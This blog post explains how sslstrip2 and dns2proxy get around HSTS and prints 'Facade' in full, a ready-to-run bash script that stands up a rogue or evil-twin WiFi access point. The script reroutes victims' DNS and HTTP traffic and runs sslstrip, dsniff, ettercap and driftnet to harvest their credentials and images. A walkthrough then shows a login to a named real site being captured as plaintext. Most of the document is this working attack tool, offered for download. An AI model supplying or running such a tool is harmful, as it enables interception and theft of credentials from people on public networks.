In 2009 I gave a presentation entitled ‘Human 0-Days’ in which I made two very clear points:

  1. The inherent selfishness of humans is perhaps their most gaping, easily exploitable vulnerability.
  2. An organisations weakest point will always be it’s employees, due to the above.
To illustrate these two points I performed a demonstration of how a rogue wireless access point could be used to both extract confidential information from associated clients and infect them with malware. Whilst the latter task has remained consistently effective over the past few years, the widespread use of SSL/TLS and HTTP Strict Transport Security has made intercepting readable and usable information somewhat more difficult – at least until now…

sslstrip

sslstrip, a now infamous tool written by Moxie Marlinspike and first demonstrated at Black Hat DC 2009, transparently hijacks HTTP traffic on a network and redirects HTTPS traffic over HTTP – allowing the contents of otherwise confidential packets to be read. It’s requisite, however, is that the attacker is a man-in-the-middle.

In reaction to the global chaos that followed this a mitigation was drafted in June 2010: an HTTP response header that informs a browser that a particular domain (or it’s sub-domains) only ever be visited over HTTPS. This would become officially known in November 2012 as HTTP Strict Transport Security. This has also been further developed to include a list of HTTPS-only domains that is included in all browsers – except IE of course. Almost all major services implement it now, but it’s adoption is still extremely low.

sslstrip2

sslstrip2 (aka sslstrip+) is a rework of sslstrip by Leonardo Nve, designed to thwart HSTS. It achieves this through the following process:

  1. A victim is forced to (i.e. karma attack), or voluntarily connects to a rogue hotspot.
  2. iptables on the router redirects all UDP port 53 (DNS) traffic through it’s own DNS server,  using dns2proxy.
  3. When the victim attempts to connect to a server, DNS queries are caught by dns2proxy, which in turn queries a legitimate DNS server, and responds to the client with a modified and reordered list – optionally, with the attackers IP’s at the top.
  4. sslstrip2 strips HTTPS by acting as a reverse proxy: client > router is HTTP, and router > server is HTTPS. HSTS is bypassed by altering domain names utilised by the client and resolving them to the legitimate IP.

A better explanation of this is given in Leonardo’s presentation at Black Hat Asia 2014.

usage

I have merged this new build of sslstrip into my rogue AP script, using the combined sslstrip2+dns2proxy rollup from the mana toolkit. The pacakge sits in a subdirectory of the main script named ‘sslstrip’, to which sslstrip2 and dns2proxy also log.
The script has been tested in Linux Mint 17 and 17.1 with pre-requisites installed as follows:
apt-get install ettercap-text-only driftnet dsniff isc-dhcp-server libnl-dev libssl-dev macchanger python-dnspython python-pcapy subversion tcpdump xterm
cd /opt/
cd aircrack-ng
make
make install 

Unless you can pull the latest build of aircrack-ng from a repository, then you’ll want to build it as done above or you’ll likely run into the same issue of WiFi channel fixation that I did with my TP-LINK TL-WN722N:

#!/bin/bash
# Facade v1.0.1
# By sub-r0sa
# https://www.bitbucket.com/sub-r0sa

# Version History:
# v1.0.0 (29/11/14) - Initial release.
# v1.0.1 (1/12/14) - Addressed channel fixation by changing to latest aircrack-ng build (1.2rc1).

# Pre-requisites:
# apt-get install ettercap-text-only driftnet dsniff isc-dhcp-server libnl-dev libssl-dev macchanger python-dnspython python-pcapy subversion tcpdump xterm

# Install latest aircrack-ng build (to mitigate 'fixed channel' bug):
# cd /opt/
# svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
# cd aircrack-ng
# make
# make install

# sslstrip-hsts build sourced from the Mana Toolkit: https://github.com/sensepost/mana/tree/master/sslstrip-hsts

# Now, the script...

# Informational.
echo
echo " _______ _______ _______ _______ ______ _______"
echo "( ____ \( ___ )( ____ \( ___ )( __ \ ( ____ \\"
echo "| ( \/| ( ) || ( \/| ( ) || ( \ )| ( \/"
echo "| (__ | (___) || | | (___) || | ) || (__"
echo "| __) | ___ || | | ___ || | | || __)"
echo "| ( | ( ) || | | ( ) || | ) || ( "
echo "| ) | ) ( || (____/\| ) ( || (__/ )| (____/\\"
echo "|/ |/ \|(_______/|/ \|(______/ (_______/"
echo
echo " Facade v1.0.1 -- Rogue AP+"
echo " By sub-r0sa"
echo
echo
echo "[+] Let's get things set up first..."
echo
echo
echo "[+] Displaying network interfaces: "
echo
ip link show
echo
echo
echo "[?] Enter the physical interface that is connected to the internet (default = wlan0): "
read -e internet_interface

if [ -z "$internet_interface" ] ; then
internet_interface="wlan0"
fi

echo "[?] Enter the physical interface to be used for the rogue AP (default = wlan1): "
read -e fakeap_interface

if [ -z "$fakeap_interface" ] ; then
fakeap_interface="wlan1"
fi

echo "[?] Enter the ESSID (network name) you want your rogue AP to use (default = Public WiFi): "
read -e ESSID

if [ -z "$ESSID" ] ; then
ESSID="Public WiFI"
fi

echo "[?] Enter the channel you wish your rogue AP to listen on (default = 11): "
read -e channel

if [ -z "$channel" ] ; then
channel="11"
fi

echo
echo
echo "[!] Initial parameters set, let's get this party started!"
echo
echo
echo "[+] Applying a random MAC address to the rogue AP interface..."
echo
ifconfig "$fakeap_interface" down
sleep 1
macchanger -r "$fakeap_interface"
ifconfig "$fakeap_interface" up
sleep 1
echo
echo "[+] Setting rogue AP WLAN interface to monitor mode..."
echo
airmon-ng start $fakeap_interface

echo
echo "[?] Enter the monitor interface to be used for the rogue AP (default = wlan1mon): "
read -e mon_interface

if [ -z "$mon_interface" ] ; then
mon_interface="wlan1mon"
fi

echo
echo "[+] Preparing DHCP..."
# Dhcpd creation
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /tmp/dhcpd.conf

# Rogue AP setup.
echo
echo "[+] Configuring AP..."
echo
echo "[?] Airbase-ng can run in a variety of modes. Do you want to define your own
Custom Configuration (c), use an Evil Twin configuration (e) or use a Default configuration (d)? "
read BASE

if [ -z "$BASE" ] ; then
BASE="d"
fi

if [ "$BASE" = "c" ] ; then
airbase-ng --help
fi

if [ "$BASE" = "c" ] ; then
echo
echo "[?] Enter switches. Note: you have already chosen an ESSID -e and Channel -c, these
cannot be redefined:"
read -e aswitch
if [ -z "$aswitch" ] ; then
echo "Nothing entered. Using default..."
BASE="d"
else
echo
echo "[+] Starting Custom Rogue AP..."
xterm -geometry 75x15+1+0 -T "FakeAP on channel $channel" -e airbase-ng -c "$channel" "$aswitch" -e "$ESSID" $mon_interface & fakeapid=$!
sleep 2
fi
fi

if [ "$BASE" = "e" ] ; then
echo
echo "[+] Starting Evil AP..."
xterm -geometry 75x15+1+0 -T "FakeAP on ALL channels" -e airbase-ng -P -C 30 -e "$ESSID" $mon_interface & fakeapid=$!
sleep 2
fi

if [ "$BASE" = "d" ] ; then
echo
echo "[+] Starting Default Rogue AP..."
xterm -geometry 75x15+1+0 -T "FakeAP on channel $channel" -e airbase-ng -c "$channel" -e "$ESSID" $mon_interface & fakeapid=$!
sleep 2
fi

echo
echo
echo "[?] Enter the tap interface used for the rogue AP (default = at0): "
read -e tap_interface

if [ -z "$tap_interface" ] ; then
tap_interface="at0"
fi
echo

# Apply networking.
echo "[+] Configuring routing and iptables..."
ifconfig lo up
ifconfig "$tap_interface" up &
sleep 1
ifconfig "$tap_interface" 10.0.0.1 netmask 255.255.255.0

# Force 1500 mtu for stability.
ifconfig "$tap_interface" mtu 1500

# Routing.
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# Flush tables.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Enable kernel forwarding.
echo 1 > /proc/sys/net/ipv4/ip_forward

# iptables.
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -t nat -F
iptables -t nat -A POSTROUTING -o "$internet_interface" -j MASQUERADE
iptables -A FORWARD -i "$tap_interface" -o "$internet_interface" -j ACCEPT
iptables -t nat -A PREROUTING -i "$tap_interface" -p udp --destination-port 53 -j DNAT --to 10.0.0.1
iptables -t nat -A PREROUTING -i "$tap_interface" -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# Set up DHCP on tap interface.
echo "[+] Starting DHCP server..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/tmp/dhcpd.conf" "$tap_interface" & dchpid=$!
sleep 3

# Change PWD.
cd sslstrip

# Start sslstrip.
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e python sslstrip.py -f lock.ico -l 10000 -a -w ../sslstrip.log & sslstripid=$!
sleep 2

# Start dns2proxy.
echo "[+] Starting dns2proxy..."
xterm -geometry 75x20+1+300 -T dns2proxy -e python dns2proxy.py "$tap_interface" & dns2proxyid=$!
sleep 2

# Return to root directory.
cd ..

# Start dsniff.
echo "[+] Starting dsniff..."
xterm -geometry 75x20+1+400 -T dsniff -e dsniff -m -i "$tap_interface" -d -w dsniff.log & dsniffid=$!
sleep 2

# Start Ettercap.
echo "[+] Configuring ettercap..."
echo
echo "[?] Ettercap will run in its most basic mode. Would you like to configure any extra switches?
For example, to load plugins or filters. Yes (y) or No (n)? "
read ETTER

if [ -z "$ETTER" ] ; then
ETTER="n"
fi

if [ "$ETTER" = "y" ] ; then
echo
ettercap --help
echo
echo "[?] For the sake of Facade, ettercap WILL USE -u and -p, so you are advised
not to use -M. Note: -i is already set and cannot be redifined here. Do not use the
-w switch. Enter your switches below: "
echo
read "eswitch"

if [ -z "$eswitch" ] ; then
echo "Nothing entered. Using default..."
ETTER="n"
else
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i "$tap_interface" & ettercapid=$!
sleep 1
fi
fi

if [ "$ETTER" = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w ettercap.log -i "$tap_interface" & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "[?] Would you also like to start driftnet to capture the victims images.
Yes (y) or No (n)? "
read DRIFT

if [ -z "$DRIFT" ] ; then
DRIFT="n"
fi

if [ "$DRIFT" = "y" ] ; then
mkdir -p "driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i "$internet_interface" -p -d driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T sslstrip-log -e tail -f sslstrip/sslstrip.log & sslstriplogid=$!

# Clear window.
clear

echo
echo "[!] Activated!"
echo
echo "[+] Facade is now running, after victim connects and surfs their credentials
will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down
ettercaps xterm shell, ettercap will also save its output to ettercap.log unless you
stated otherwise. Driftnet images will be saved to driftftnetdata"
echo
echo
echo "[!] IMPORTANT!"
echo
echo "When you want to close Facade and begin clean up, enter X.
Note: If Facade is not closed properly network instability will ensue..."
echo

# Loop until the termination character is entered.
QUIT=""
while [ "$QUIT" != "X" ]; do
echo "To end, enter X:"
read QUIT
done

# Clean up
echo
echo "[+] Cleaning up processes..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${dns2proxyid}
kill ${dsniffid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

echo
echo "[+] Resetting networking..."
echo
airmon-ng stop "$mon_interface"
sleep 1
ifconfig "$fakeap_interface" down
sleep 1
macchanger -p "$fakeap_interface"
ifconfig "$fakeap_interface" up
sleep 1
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

rm /tmp/dhcpd.conf

echo
echo "[+] Clean up successful."

# End.
exit

walkthrough

The script has a set of default values built into it, which for any system running two WiFi adapters should allow it to work straight out of the box and not be too intense.

The script first sets up the adapters, iptables rules, DHCP, and fires up the access point on a tap interface:

sslstrip2, dns2proxy and dsniff are then started using default parameters:

ettercap is then fired up using either a default set of parameters or user defined ones:

Finally, driftnet can be used to capture images that pass through the AP (not done in this case), and the sslstrip log is tailed:

A user connects:

For this test secure.powershop.co.nz was used (disclaimer: this is in no way intended as a ‘how-to’ on how to specifically hack their service, as this is a network-based exploit) as the page the victim wishes to log in to. To their credit, they have their security pretty well sorted out! Their HTTP response headers are well configured, they’re using an EV cert and they’re offering up the strongest cipher suites possible. So, kudos to them:

However, in this case, given the attacker is in control of DNS, dns2proxy serves up the page as websecure.powershop.co.nz so HSTS is bypassed. Additionally, sslstrip adds a nice touch of social engineering by changing the favicon to a lock. Therefore, when the user attempts to log in the credentials can be intercepted and read as plaintext:

Source

You can find the updated source for Facade on GitHub.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s